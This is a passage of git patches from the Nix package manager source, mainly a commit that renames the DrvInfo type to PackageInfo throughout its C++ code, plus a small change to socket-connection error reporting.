base.size() + 1); - if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1) - 
throw SysError("cannot connect to socket at '%s'", path); - _exit(0); + try { + pipe.readSide.close(); + Path dir = dirOf(path); + if (chdir(dir.c_str()) == -1) + throw SysError("chdir to '%s' failed", dir); + std::string base(baseNameOf(path)); + if (base.size() + 1 >= sizeof(addr.sun_path)) + throw Error("socket path '%s' is too long", base); + memcpy(addr.sun_path, base.c_str(), base.size() + 1); + if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1) + throw SysError("cannot connect to socket at '%s'", path); + writeFull(pipe.writeSide.get(), "0\n"); + } catch (SysError & e) { + writeFull(pipe.writeSide.get(), fmt("%d\n", e.errNo)); + } catch (...) { + writeFull(pipe.writeSide.get(), "-1\n"); + } }); - int status = pid.wait(); - if (status != 0) + pipe.writeSide.close(); + auto errNo = string2Int(chomp(drainFD(pipe.readSide.get()))); + if (!errNo || *errNo == -1) throw Error("cannot connect to socket at '%s'", path); + else if (*errNo > 0) { + errno = *errNo; + throw SysError("cannot connect to socket at '%s'", path); + } } else { memcpy(addr.sun_path, path.c_str(), path.size() + 1); if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1) From 65255edc9b0c2bbe8b0be50ac7b2671b50309ea8 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 16 Jan 2024 15:25:04 +0100 Subject: [PATCH 276/654] DerivationInfo -> PackageInfo This does not yet resolve the coupling between packages and derivations, but it makes the code more consistent with the terminology, and it accentuates places where the coupling is obvious, such as auto drvPath = packageInfo.queryDrvPath(); if (!drvPath) throw Error("'%s' is not a derivation", what()); ... which isn't wrong, and in my opinion, doesn't even look wrong, because it just reflects the current logic. However, I do like that we can now start to see in the code that this coupling is perhaps a bit arbitrary. After this rename, we can bring the DerivingPath concept into type and start to lift this limitation. 
--- src/libcmd/installable-attr-path.cc | 10 +-- src/libcmd/installable-value.hh | 2 +- src/libcmd/installables.hh | 2 +- src/libcmd/repl.cc | 6 +- src/libexpr/get-drvs.cc | 48 ++++++------- src/libexpr/get-drvs.hh | 18 ++--- src/nix-build/nix-build.cc | 16 ++--- src/nix-env/nix-env.cc | 94 +++++++++++++------------- src/nix-env/user-env.cc | 8 +-- src/nix-env/user-env.hh | 4 +- src/nix-instantiate/nix-instantiate.cc | 2 +- src/nix/flake.cc | 6 +- src/nix/profile.cc | 6 +- 13 files changed, 111 insertions(+), 111 deletions(-) diff --git a/src/libcmd/installable-attr-path.cc b/src/libcmd/installable-attr-path.cc index 06e507872..3ec1c1614 100644 --- a/src/libcmd/installable-attr-path.cc +++ b/src/libcmd/installable-attr-path.cc @@ -58,22 +58,22 @@ DerivedPathsWithInfo InstallableAttrPath::toDerivedPaths() Bindings & autoArgs = *cmd.getAutoArgs(*state); - DrvInfos drvInfos; - getDerivations(*state, *v, "", autoArgs, drvInfos, false); + PackageInfos packageInfos; + getDerivations(*state, *v, "", autoArgs, packageInfos, false); // Backward compatibility hack: group results by drvPath. This // helps keep .all output together. 
std::map byDrvPath; - for (auto & drvInfo : drvInfos) { - auto drvPath = drvInfo.queryDrvPath(); + for (auto & packageInfo : packageInfos) { + auto drvPath = packageInfo.queryDrvPath(); if (!drvPath) throw Error("'%s' is not a derivation", what()); auto newOutputs = std::visit(overloaded { [&](const ExtendedOutputsSpec::Default & d) -> OutputsSpec { std::set outputsToInstall; - for (auto & output : drvInfo.queryOutputs(false, true)) + for (auto & output : packageInfo.queryOutputs(false, true)) outputsToInstall.insert(output.first); return OutputsSpec::Names { std::move(outputsToInstall) }; }, diff --git a/src/libcmd/installable-value.hh b/src/libcmd/installable-value.hh index 3138ce8ec..f300d392b 100644 --- a/src/libcmd/installable-value.hh +++ b/src/libcmd/installable-value.hh @@ -6,7 +6,7 @@ namespace nix { -struct DrvInfo; +struct PackageInfo; struct SourceExprCommand; namespace eval_cache { class EvalCache; class AttrCursor; } diff --git a/src/libcmd/installables.hh b/src/libcmd/installables.hh index 95e8841ca..bf5759230 100644 --- a/src/libcmd/installables.hh +++ b/src/libcmd/installables.hh @@ -12,7 +12,7 @@ namespace nix { -struct DrvInfo; +struct PackageInfo; enum class Realise { /** diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index 918b2e53a..d7d8f9819 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -450,10 +450,10 @@ static bool isVarName(std::string_view s) StorePath NixRepl::getDerivationPath(Value & v) { - auto drvInfo = getDerivation(*state, v, false); - if (!drvInfo) + auto packageInfo = getDerivation(*state, v, false); + if (!packageInfo) throw Error("expression does not evaluate to a derivation, so I can't build it"); - auto drvPath = drvInfo->queryDrvPath(); + auto drvPath = packageInfo->queryDrvPath(); if (!drvPath) throw Error("expression did not evaluate to a valid derivation (no 'drvPath' attribute)"); if (!state->store->isValidPath(*drvPath)) diff --git a/src/libexpr/get-drvs.cc b/src/libexpr/get-drvs.cc index 
a6441871c..51449ccb3 100644 --- a/src/libexpr/get-drvs.cc +++ b/src/libexpr/get-drvs.cc @@ -11,13 +11,13 @@ namespace nix { -DrvInfo::DrvInfo(EvalState & state, std::string attrPath, Bindings * attrs) +PackageInfo::PackageInfo(EvalState & state, std::string attrPath, Bindings * attrs) : state(&state), attrs(attrs), attrPath(std::move(attrPath)) { } -DrvInfo::DrvInfo(EvalState & state, ref store, const std::string & drvPathWithOutputs) +PackageInfo::PackageInfo(EvalState & state, ref store, const std::string & drvPathWithOutputs) : state(&state), attrs(nullptr), attrPath("") { auto [drvPath, selectedOutputs] = parsePathWithOutputs(*store, drvPathWithOutputs); @@ -45,7 +45,7 @@ DrvInfo::DrvInfo(EvalState & state, ref store, const std::string & drvPat } -std::string DrvInfo::queryName() const +std::string PackageInfo::queryName() const { if (name == "" && attrs) { auto i = attrs->find(state->sName); @@ -56,7 +56,7 @@ std::string DrvInfo::queryName() const } -std::string DrvInfo::querySystem() const +std::string PackageInfo::querySystem() const { if (system == "" && attrs) { auto i = attrs->find(state->sSystem); @@ -66,7 +66,7 @@ std::string DrvInfo::querySystem() const } -std::optional DrvInfo::queryDrvPath() const +std::optional PackageInfo::queryDrvPath() const { if (!drvPath && attrs) { Bindings::iterator i = attrs->find(state->sDrvPath); @@ -80,7 +80,7 @@ std::optional DrvInfo::queryDrvPath() const } -StorePath DrvInfo::requireDrvPath() const +StorePath PackageInfo::requireDrvPath() const { if (auto drvPath = queryDrvPath()) return *drvPath; @@ -88,7 +88,7 @@ StorePath DrvInfo::requireDrvPath() const } -StorePath DrvInfo::queryOutPath() const +StorePath PackageInfo::queryOutPath() const { if (!outPath && attrs) { Bindings::iterator i = attrs->find(state->sOutPath); @@ -102,7 +102,7 @@ StorePath DrvInfo::queryOutPath() const } -DrvInfo::Outputs DrvInfo::queryOutputs(bool withPaths, bool onlyOutputsToInstall) +PackageInfo::Outputs PackageInfo::queryOutputs(bool 
withPaths, bool onlyOutputsToInstall) { if (outputs.empty()) { /* Get the ‘outputs’ list. */ @@ -164,7 +164,7 @@ DrvInfo::Outputs DrvInfo::queryOutputs(bool withPaths, bool onlyOutputsToInstall } -std::string DrvInfo::queryOutputName() const +std::string PackageInfo::queryOutputName() const { if (outputName == "" && attrs) { Bindings::iterator i = attrs->find(state->sOutputName); @@ -174,7 +174,7 @@ std::string DrvInfo::queryOutputName() const } -Bindings * DrvInfo::getMeta() +Bindings * PackageInfo::getMeta() { if (meta) return meta; if (!attrs) return 0; @@ -186,7 +186,7 @@ Bindings * DrvInfo::getMeta() } -StringSet DrvInfo::queryMetaNames() +StringSet PackageInfo::queryMetaNames() { StringSet res; if (!getMeta()) return res; @@ -196,7 +196,7 @@ StringSet DrvInfo::queryMetaNames() } -bool DrvInfo::checkMeta(Value & v) +bool PackageInfo::checkMeta(Value & v) { state->forceValue(v, v.determinePos(noPos)); if (v.type() == nList) { @@ -216,7 +216,7 @@ bool DrvInfo::checkMeta(Value & v) } -Value * DrvInfo::queryMeta(const std::string & name) +Value * PackageInfo::queryMeta(const std::string & name) { if (!getMeta()) return 0; Bindings::iterator a = meta->find(state->symbols.create(name)); @@ -225,7 +225,7 @@ Value * DrvInfo::queryMeta(const std::string & name) } -std::string DrvInfo::queryMetaString(const std::string & name) +std::string PackageInfo::queryMetaString(const std::string & name) { Value * v = queryMeta(name); if (!v || v->type() != nString) return ""; @@ -233,7 +233,7 @@ std::string DrvInfo::queryMetaString(const std::string & name) } -NixInt DrvInfo::queryMetaInt(const std::string & name, NixInt def) +NixInt PackageInfo::queryMetaInt(const std::string & name, NixInt def) { Value * v = queryMeta(name); if (!v) return def; @@ -247,7 +247,7 @@ NixInt DrvInfo::queryMetaInt(const std::string & name, NixInt def) return def; } -NixFloat DrvInfo::queryMetaFloat(const std::string & name, NixFloat def) +NixFloat PackageInfo::queryMetaFloat(const std::string & 
name, NixFloat def) { Value * v = queryMeta(name); if (!v) return def; @@ -262,7 +262,7 @@ NixFloat DrvInfo::queryMetaFloat(const std::string & name, NixFloat def) } -bool DrvInfo::queryMetaBool(const std::string & name, bool def) +bool PackageInfo::queryMetaBool(const std::string & name, bool def) { Value * v = queryMeta(name); if (!v) return def; @@ -277,7 +277,7 @@ bool DrvInfo::queryMetaBool(const std::string & name, bool def) } -void DrvInfo::setMeta(const std::string & name, Value * v) +void PackageInfo::setMeta(const std::string & name, Value * v) { getMeta(); auto attrs = state->buildBindings(1 + (meta ? meta->size() : 0)); @@ -300,7 +300,7 @@ typedef std::set Done; The result boolean indicates whether it makes sense for the caller to recursively search for derivations in `v'. */ static bool getDerivation(EvalState & state, Value & v, - const std::string & attrPath, DrvInfos & drvs, Done & done, + const std::string & attrPath, PackageInfos & drvs, Done & done, bool ignoreAssertionFailures) { try { @@ -311,7 +311,7 @@ static bool getDerivation(EvalState & state, Value & v, derivation {...}; y = x;}'. 
*/ if (!done.insert(v.attrs).second) return false; - DrvInfo drv(state, attrPath, v.attrs); + PackageInfo drv(state, attrPath, v.attrs); drv.queryName(); @@ -326,11 +326,11 @@ static bool getDerivation(EvalState & state, Value & v, } -std::optional getDerivation(EvalState & state, Value & v, +std::optional getDerivation(EvalState & state, Value & v, bool ignoreAssertionFailures) { Done done; - DrvInfos drvs; + PackageInfos drvs; getDerivation(state, v, "", drvs, done, ignoreAssertionFailures); if (drvs.size() != 1) return {}; return std::move(drvs.front()); @@ -348,7 +348,7 @@ static std::regex attrRegex("[A-Za-z_][A-Za-z0-9-_+]*"); static void getDerivations(EvalState & state, Value & vIn, const std::string & pathPrefix, Bindings & autoArgs, - DrvInfos & drvs, Done & done, + PackageInfos & drvs, Done & done, bool ignoreAssertionFailures) { Value v; @@ -401,7 +401,7 @@ static void getDerivations(EvalState & state, Value & vIn, void getDerivations(EvalState & state, Value & v, const std::string & pathPrefix, - Bindings & autoArgs, DrvInfos & drvs, bool ignoreAssertionFailures) + Bindings & autoArgs, PackageInfos & drvs, bool ignoreAssertionFailures) { Done done; getDerivations(state, v, pathPrefix, autoArgs, drvs, done, ignoreAssertionFailures); diff --git a/src/libexpr/get-drvs.hh b/src/libexpr/get-drvs.hh index 584d64ac1..b886581b6 100644 --- a/src/libexpr/get-drvs.hh +++ b/src/libexpr/get-drvs.hh @@ -11,7 +11,7 @@ namespace nix { -struct DrvInfo +struct PackageInfo { public: typedef std::map> Outputs; @@ -43,9 +43,9 @@ public: */ std::string attrPath; - DrvInfo(EvalState & state) : state(&state) { }; - DrvInfo(EvalState & state, std::string attrPath, Bindings * attrs); - DrvInfo(EvalState & state, ref store, const std::string & drvPathWithOutputs); + PackageInfo(EvalState & state) : state(&state) { }; + PackageInfo(EvalState & state, std::string attrPath, Bindings * attrs); + PackageInfo(EvalState & state, ref store, const std::string & drvPathWithOutputs); 
std::string queryName() const; std::string querySystem() const; @@ -82,21 +82,21 @@ public: #if HAVE_BOEHMGC -typedef std::list> DrvInfos; +typedef std::list> PackageInfos; #else -typedef std::list DrvInfos; +typedef std::list PackageInfos; #endif /** - * If value `v` denotes a derivation, return a DrvInfo object + * If value `v` denotes a derivation, return a PackageInfo object * describing it. Otherwise return nothing. */ -std::optional getDerivation(EvalState & state, +std::optional getDerivation(EvalState & state, Value & v, bool ignoreAssertionFailures); void getDerivations(EvalState & state, Value & v, const std::string & pathPrefix, - Bindings & autoArgs, DrvInfos & drvs, + Bindings & autoArgs, PackageInfos & drvs, bool ignoreAssertionFailures); diff --git a/src/nix-build/nix-build.cc b/src/nix-build/nix-build.cc index 1ad4b387c..549adfbf7 100644 --- a/src/nix-build/nix-build.cc +++ b/src/nix-build/nix-build.cc @@ -289,7 +289,7 @@ static void main_nix_build(int argc, char * * argv) if (runEnv) setenv("IN_NIX_SHELL", pure ? "pure" : "impure", 1); - DrvInfos drvs; + PackageInfos drvs; /* Parse the expressions. */ std::vector exprs; @@ -307,7 +307,7 @@ static void main_nix_build(int argc, char * * argv) } catch (Error & e) {}; auto [path, outputNames] = parsePathWithOutputs(absolute); if (evalStore->isStorePath(path) && hasSuffix(path, ".drv")) - drvs.push_back(DrvInfo(*state, evalStore, absolute)); + drvs.push_back(PackageInfo(*state, evalStore, absolute)); else /* If we're in a #! script, interpret filenames relative to the script. 
*/ @@ -383,8 +383,8 @@ static void main_nix_build(int argc, char * * argv) if (drvs.size() != 1) throw UsageError("nix-shell requires a single derivation"); - auto & drvInfo = drvs.front(); - auto drv = evalStore->derivationFromPath(drvInfo.requireDrvPath()); + auto & packageInfo = drvs.front(); + auto drv = evalStore->derivationFromPath(packageInfo.requireDrvPath()); std::vector pathsToBuild; RealisedPath::Set pathsToCopy; @@ -527,7 +527,7 @@ static void main_nix_build(int argc, char * * argv) for (const auto & [inputDrv, inputNode] : drv.inputDrvs.map) accumInputClosure(inputDrv, inputNode); - ParsedDerivation parsedDrv(drvInfo.requireDrvPath(), drv); + ParsedDerivation parsedDrv(packageInfo.requireDrvPath(), drv); if (auto structAttrs = parsedDrv.prepareStructuredAttrs(*store, inputs)) { auto json = structAttrs.value(); @@ -620,10 +620,10 @@ static void main_nix_build(int argc, char * * argv) std::map> drvMap; - for (auto & drvInfo : drvs) { - auto drvPath = drvInfo.requireDrvPath(); + for (auto & packageInfo : drvs) { + auto drvPath = packageInfo.requireDrvPath(); - auto outputName = drvInfo.queryOutputName(); + auto outputName = packageInfo.queryOutputName(); if (outputName == "") throw Error("derivation '%s' lacks an 'outputName' attribute", store->printStorePath(drvPath)); diff --git a/src/nix-env/nix-env.cc b/src/nix-env/nix-env.cc index e2bbd9775..d5b46c57a 100644 --- a/src/nix-env/nix-env.cc +++ b/src/nix-env/nix-env.cc @@ -184,7 +184,7 @@ static void loadSourceExpr(EvalState & state, const SourcePath & path, Value & v static void loadDerivations(EvalState & state, const SourcePath & nixExprPath, std::string systemFilter, Bindings & autoArgs, - const std::string & pathPrefix, DrvInfos & elems) + const std::string & pathPrefix, PackageInfos & elems) { Value vRoot; loadSourceExpr(state, nixExprPath, vRoot); @@ -195,7 +195,7 @@ static void loadDerivations(EvalState & state, const SourcePath & nixExprPath, /* Filter out all derivations not applicable to the 
current system. */ - for (DrvInfos::iterator i = elems.begin(), j; i != elems.end(); i = j) { + for (PackageInfos::iterator i = elems.begin(), j; i != elems.end(); i = j) { j = i; j++; if (systemFilter != "*" && i->querySystem() != systemFilter) elems.erase(i); @@ -203,13 +203,13 @@ static void loadDerivations(EvalState & state, const SourcePath & nixExprPath, } -static long getPriority(EvalState & state, DrvInfo & drv) +static long getPriority(EvalState & state, PackageInfo & drv) { return drv.queryMetaInt("priority", 0); } -static long comparePriorities(EvalState & state, DrvInfo & drv1, DrvInfo & drv2) +static long comparePriorities(EvalState & state, PackageInfo & drv1, PackageInfo & drv2) { return getPriority(state, drv2) - getPriority(state, drv1); } @@ -217,7 +217,7 @@ static long comparePriorities(EvalState & state, DrvInfo & drv1, DrvInfo & drv2) // FIXME: this function is rather slow since it checks a single path // at a time. -static bool isPrebuilt(EvalState & state, DrvInfo & elem) +static bool isPrebuilt(EvalState & state, PackageInfo & elem) { auto path = elem.queryOutPath(); if (state.store->isValidPath(path)) return true; @@ -236,11 +236,11 @@ static void checkSelectorUse(DrvNames & selectors) namespace { -std::set searchByPrefix(const DrvInfos & allElems, std::string_view prefix) { +std::set searchByPrefix(const PackageInfos & allElems, std::string_view prefix) { constexpr std::size_t maxResults = 3; std::set result; - for (const auto & drvInfo : allElems) { - const auto drvName = DrvName { drvInfo.queryName() }; + for (const auto & packageInfo : allElems) { + const auto drvName = DrvName { packageInfo.queryName() }; if (hasPrefix(drvName.name, prefix)) { result.emplace(drvName.name); @@ -254,11 +254,11 @@ std::set searchByPrefix(const DrvInfos & allElems, std::string_view struct Match { - DrvInfo drvInfo; + PackageInfo packageInfo; std::size_t index; - Match(DrvInfo drvInfo_, std::size_t index_) - : drvInfo{std::move(drvInfo_)} + 
Match(PackageInfo packageInfo_, std::size_t index_) + : packageInfo{std::move(packageInfo_)} , index{index_} {} }; @@ -276,7 +276,7 @@ std::vector pickNewestOnly(EvalState & state, std::vector matches) StringSet multiple; for (auto & match : matches) { - auto & oneDrv = match.drvInfo; + auto & oneDrv = match.packageInfo; const auto drvName = DrvName { oneDrv.queryName() }; long comparison = 1; @@ -284,7 +284,7 @@ std::vector pickNewestOnly(EvalState & state, std::vector matches) const auto itOther = newest.find(drvName.name); if (itOther != newest.end()) { - auto & newestDrv = itOther->second.drvInfo; + auto & newestDrv = itOther->second.packageInfo; comparison = oneDrv.querySystem() == newestDrv.querySystem() ? 0 : @@ -319,23 +319,23 @@ std::vector pickNewestOnly(EvalState & state, std::vector matches) } // end namespace -static DrvInfos filterBySelector(EvalState & state, const DrvInfos & allElems, +static PackageInfos filterBySelector(EvalState & state, const PackageInfos & allElems, const Strings & args, bool newestOnly) { DrvNames selectors = drvNamesFromArgs(args); if (selectors.empty()) selectors.emplace_back("*"); - DrvInfos elems; + PackageInfos elems; std::set done; for (auto & selector : selectors) { std::vector matches; - for (const auto & [index, drvInfo] : enumerate(allElems)) { - const auto drvName = DrvName { drvInfo.queryName() }; + for (const auto & [index, packageInfo] : enumerate(allElems)) { + const auto drvName = DrvName { packageInfo.queryName() }; if (selector.matches(drvName)) { ++selector.hits; - matches.emplace_back(drvInfo, index); + matches.emplace_back(packageInfo, index); } } @@ -347,7 +347,7 @@ static DrvInfos filterBySelector(EvalState & state, const DrvInfos & allElems, haven't inserted before. 
*/ for (auto & match : matches) if (done.insert(match.index).second) - elems.push_back(match.drvInfo); + elems.push_back(match.packageInfo); if (selector.hits == 0 && selector.fullName != "*") { const auto prefixHits = searchByPrefix(allElems, selector.name); @@ -376,7 +376,7 @@ static bool isPath(std::string_view s) static void queryInstSources(EvalState & state, InstallSourceInfo & instSource, const Strings & args, - DrvInfos & elems, bool newestOnly) + PackageInfos & elems, bool newestOnly) { InstallSourceType type = instSource.type; if (type == srcUnknown && args.size() > 0 && isPath(args.front())) @@ -392,7 +392,7 @@ static void queryInstSources(EvalState & state, /* Load the derivations from the (default or specified) Nix expression. */ - DrvInfos allElems; + PackageInfos allElems; loadDerivations(state, *instSource.nixExprPath, instSource.systemFilter, *instSource.autoArgs, "", allElems); @@ -433,7 +433,7 @@ static void queryInstSources(EvalState & state, std::string name(path.name()); - DrvInfo elem(state, "", nullptr); + PackageInfo elem(state, "", nullptr); elem.setName(name); if (path.isDerivation()) { @@ -476,7 +476,7 @@ static void queryInstSources(EvalState & state, } -static void printMissing(EvalState & state, DrvInfos & elems) +static void printMissing(EvalState & state, PackageInfos & elems) { std::vector targets; for (auto & i : elems) @@ -494,7 +494,7 @@ static void printMissing(EvalState & state, DrvInfos & elems) } -static bool keep(DrvInfo & drv) +static bool keep(PackageInfo & drv) { return drv.queryMetaBool("keep", false); } @@ -506,7 +506,7 @@ static void installDerivations(Globals & globals, debug("installing derivations"); /* Get the set of user environment elements to be installed. */ - DrvInfos newElems, newElemsTmp; + PackageInfos newElems, newElemsTmp; queryInstSources(*globals.state, globals.instSource, args, newElemsTmp, true); /* If --prebuilt-only is given, filter out source-only packages. 
*/ @@ -529,12 +529,12 @@ static void installDerivations(Globals & globals, while (true) { auto lockToken = optimisticLockProfile(profile); - DrvInfos allElems(newElems); + PackageInfos allElems(newElems); /* Add in the already installed derivations, unless they have the same name as a to-be-installed element. */ if (!globals.removeAll) { - DrvInfos installedElems = queryInstalled(*globals.state, profile); + PackageInfos installedElems = queryInstalled(*globals.state, profile); for (auto & i : installedElems) { DrvName drvName(i.queryName()); @@ -592,14 +592,14 @@ static void upgradeDerivations(Globals & globals, while (true) { auto lockToken = optimisticLockProfile(globals.profile); - DrvInfos installedElems = queryInstalled(*globals.state, globals.profile); + PackageInfos installedElems = queryInstalled(*globals.state, globals.profile); /* Fetch all derivations from the input file. */ - DrvInfos availElems; + PackageInfos availElems; queryInstSources(*globals.state, globals.instSource, args, availElems, false); /* Go through all installed derivations. */ - DrvInfos newElems; + PackageInfos newElems; for (auto & i : installedElems) { DrvName drvName(i.queryName()); @@ -617,7 +617,7 @@ static void upgradeDerivations(Globals & globals, priority. If there are still multiple matches, take the one with the highest version. Do not upgrade if it would decrease the priority. 
*/ - DrvInfos::iterator bestElem = availElems.end(); + PackageInfos::iterator bestElem = availElems.end(); std::string bestVersion; for (auto j = availElems.begin(); j != availElems.end(); ++j) { if (comparePriorities(*globals.state, i, *j) > 0) @@ -687,7 +687,7 @@ static void opUpgrade(Globals & globals, Strings opFlags, Strings opArgs) } -static void setMetaFlag(EvalState & state, DrvInfo & drv, +static void setMetaFlag(EvalState & state, PackageInfo & drv, const std::string & name, const std::string & value) { auto v = state.allocValue(); @@ -711,7 +711,7 @@ static void opSetFlag(Globals & globals, Strings opFlags, Strings opArgs) while (true) { std::string lockToken = optimisticLockProfile(globals.profile); - DrvInfos installedElems = queryInstalled(*globals.state, globals.profile); + PackageInfos installedElems = queryInstalled(*globals.state, globals.profile); /* Update all matching derivations. */ for (auto & i : installedElems) { @@ -745,13 +745,13 @@ static void opSet(Globals & globals, Strings opFlags, Strings opArgs) else throw UsageError("unknown flag '%1%'", arg); } - DrvInfos elems; + PackageInfos elems; queryInstSources(*globals.state, globals.instSource, opArgs, elems, true); if (elems.size() != 1) throw Error("--set requires exactly one derivation"); - DrvInfo & drv(elems.front()); + PackageInfo & drv(elems.front()); if (globals.forceName != "") drv.setName(globals.forceName); @@ -786,10 +786,10 @@ static void uninstallDerivations(Globals & globals, Strings & selectors, while (true) { auto lockToken = optimisticLockProfile(profile); - DrvInfos workingElems = queryInstalled(*globals.state, profile); + PackageInfos workingElems = queryInstalled(*globals.state, profile); for (auto & selector : selectors) { - DrvInfos::iterator split = workingElems.begin(); + PackageInfos::iterator split = workingElems.begin(); if (isPath(selector)) { StorePath selectorStorePath = globals.state->store->followLinksToStorePath(selector); split = std::partition( @@ -838,7 
+838,7 @@ static bool cmpChars(char a, char b) } -static bool cmpElemByName(const DrvInfo & a, const DrvInfo & b) +static bool cmpElemByName(const PackageInfo & a, const PackageInfo & b) { auto a_name = a.queryName(); auto b_name = b.queryName(); @@ -891,7 +891,7 @@ void printTable(Table & table) typedef enum { cvLess, cvEqual, cvGreater, cvUnavail } VersionDiff; static VersionDiff compareVersionAgainstSet( - const DrvInfo & elem, const DrvInfos & elems, std::string & version) + const PackageInfo & elem, const PackageInfos & elems, std::string & version) { DrvName name(elem.queryName()); @@ -922,7 +922,7 @@ static VersionDiff compareVersionAgainstSet( } -static void queryJSON(Globals & globals, std::vector & elems, bool printOutPath, bool printDrvPath, bool printMeta) +static void queryJSON(Globals & globals, std::vector & elems, bool printOutPath, bool printDrvPath, bool printMeta) { using nlohmann::json; json topObj = json::object(); @@ -942,7 +942,7 @@ static void queryJSON(Globals & globals, std::vector & elems, bool prin }; { - DrvInfo::Outputs outputs = i.queryOutputs(printOutPath); + PackageInfo::Outputs outputs = i.queryOutputs(printOutPath); json &outputObj = pkgObj["outputs"]; outputObj = json::object(); for (auto & j : outputs) { @@ -1032,7 +1032,7 @@ static void opQuery(Globals & globals, Strings opFlags, Strings opArgs) throw UsageError("--attr-path(-P) only works with --available"); /* Obtain derivation information from the specified source. 
*/ - DrvInfos availElems, installedElems; + PackageInfos availElems, installedElems; if (source == sInstalled || compareVersions || printStatus) installedElems = queryInstalled(*globals.state, globals.profile); @@ -1042,16 +1042,16 @@ static void opQuery(Globals & globals, Strings opFlags, Strings opArgs) globals.instSource.systemFilter, *globals.instSource.autoArgs, attrPath, availElems); - DrvInfos elems_ = filterBySelector(*globals.state, + PackageInfos elems_ = filterBySelector(*globals.state, source == sInstalled ? installedElems : availElems, opArgs, false); - DrvInfos & otherElems(source == sInstalled ? availElems : installedElems); + PackageInfos & otherElems(source == sInstalled ? availElems : installedElems); /* Sort them by name. */ /* !!! */ - std::vector elems; + std::vector elems; for (auto & i : elems_) elems.push_back(i); sort(elems.begin(), elems.end(), cmpElemByName); @@ -1192,7 +1192,7 @@ static void opQuery(Globals & globals, Strings opFlags, Strings opArgs) attrs["outputName"] = i.queryOutputName(); if (printOutPath && !xmlOutput) { - DrvInfo::Outputs outputs = i.queryOutputs(); + PackageInfo::Outputs outputs = i.queryOutputs(); std::string s; for (auto & j : outputs) { if (!s.empty()) s += ';'; @@ -1212,7 +1212,7 @@ static void opQuery(Globals & globals, Strings opFlags, Strings opArgs) if (xmlOutput) { XMLOpenElement item(xml, "item", attrs); - DrvInfo::Outputs outputs = i.queryOutputs(printOutPath); + PackageInfo::Outputs outputs = i.queryOutputs(printOutPath); for (auto & j : outputs) { XMLAttrs attrs2; attrs2["name"] = j.first; diff --git a/src/nix-env/user-env.cc b/src/nix-env/user-env.cc index 973b6ee2b..2f9c988d5 100644 --- a/src/nix-env/user-env.cc +++ b/src/nix-env/user-env.cc @@ -15,9 +15,9 @@ namespace nix { -DrvInfos queryInstalled(EvalState & state, const Path & userEnv) +PackageInfos queryInstalled(EvalState & state, const Path & userEnv) { - DrvInfos elems; + PackageInfos elems; if (pathExists(userEnv + "/manifest.json")) throw 
Error("profile '%s' is incompatible with 'nix-env'; please use 'nix profile' instead", userEnv); auto manifestFile = userEnv + "/manifest.nix"; @@ -31,7 +31,7 @@ DrvInfos queryInstalled(EvalState & state, const Path & userEnv) } -bool createUserEnv(EvalState & state, DrvInfos & elems, +bool createUserEnv(EvalState & state, PackageInfos & elems, const Path & profile, bool keepDerivations, const std::string & lockToken) { @@ -57,7 +57,7 @@ bool createUserEnv(EvalState & state, DrvInfos & elems, output paths, and optionally the derivation path, as well as the meta attributes. */ std::optional drvPath = keepDerivations ? i.queryDrvPath() : std::nullopt; - DrvInfo::Outputs outputs = i.queryOutputs(true, true); + PackageInfo::Outputs outputs = i.queryOutputs(true, true); StringSet metaNames = i.queryMetaNames(); auto attrs = state.buildBindings(7 + outputs.size()); diff --git a/src/nix-env/user-env.hh b/src/nix-env/user-env.hh index af45d2d85..15da3fcb3 100644 --- a/src/nix-env/user-env.hh +++ b/src/nix-env/user-env.hh @@ -5,9 +5,9 @@ namespace nix { -DrvInfos queryInstalled(EvalState & state, const Path & userEnv); +PackageInfos queryInstalled(EvalState & state, const Path & userEnv); -bool createUserEnv(EvalState & state, DrvInfos & elems, +bool createUserEnv(EvalState & state, PackageInfos & elems, const Path & profile, bool keepDerivations, const std::string & lockToken); diff --git a/src/nix-instantiate/nix-instantiate.cc b/src/nix-instantiate/nix-instantiate.cc index 87bc986e8..b9e626aed 100644 --- a/src/nix-instantiate/nix-instantiate.cc +++ b/src/nix-instantiate/nix-instantiate.cc @@ -62,7 +62,7 @@ void processExpr(EvalState & state, const Strings & attrPaths, std::cout << std::endl; } } else { - DrvInfos drvs; + PackageInfos drvs; getDerivations(state, v, "", autoArgs, drvs, false); for (auto & i : drvs) { auto drvPath = i.requireDrvPath(); diff --git a/src/nix/flake.cc b/src/nix/flake.cc index 2b6e56283..bebc62deb 100644 --- a/src/nix/flake.cc +++ 
b/src/nix/flake.cc @@ -395,11 +395,11 @@ struct CmdFlakeCheck : FlakeCommand auto checkDerivation = [&](const std::string & attrPath, Value & v, const PosIdx pos) -> std::optional { try { - auto drvInfo = getDerivation(*state, v, false); - if (!drvInfo) + auto packageInfo = getDerivation(*state, v, false); + if (!packageInfo) throw Error("flake attribute '%s' is not a derivation", attrPath); // FIXME: check meta attributes - return drvInfo->queryDrvPath(); + return packageInfo->queryDrvPath(); } catch (Error & e) { e.addTrace(resolve(pos), hintfmt("while checking the derivation '%s'", attrPath)); reportError(e); diff --git a/src/nix/profile.cc b/src/nix/profile.cc index 616fe9512..812e703b4 100644 --- a/src/nix/profile.cc +++ b/src/nix/profile.cc @@ -168,11 +168,11 @@ struct ProfileManifest state.allowPath(state.store->followLinksToStore(profile)); state.allowPath(state.store->followLinksToStore(profile + "/manifest.nix")); - auto drvInfos = queryInstalled(state, state.store->followLinksToStore(profile)); + auto packageInfos = queryInstalled(state, state.store->followLinksToStore(profile)); - for (auto & drvInfo : drvInfos) { + for (auto & packageInfo : packageInfos) { ProfileElement element; - element.storePaths = {drvInfo.queryOutPath()}; + element.storePaths = {packageInfo.queryOutPath()}; addElement(std::move(element)); } } From ea6aa5ffd87b27ddd89cab541f4b98b3efcb7ea9 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 16 Jan 2024 15:44:02 +0100 Subject: [PATCH 277/654] Package{,Info}: comments --- src/libexpr/get-drvs.hh | 4 +++- src/libstore/builtins/buildenv.hh | 3 +++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/src/libexpr/get-drvs.hh b/src/libexpr/get-drvs.hh index b886581b6..e8c1190f7 100644 --- a/src/libexpr/get-drvs.hh +++ b/src/libexpr/get-drvs.hh @@ -10,7 +10,9 @@ namespace nix { - +/** + * A "parsed" package attribute set. 
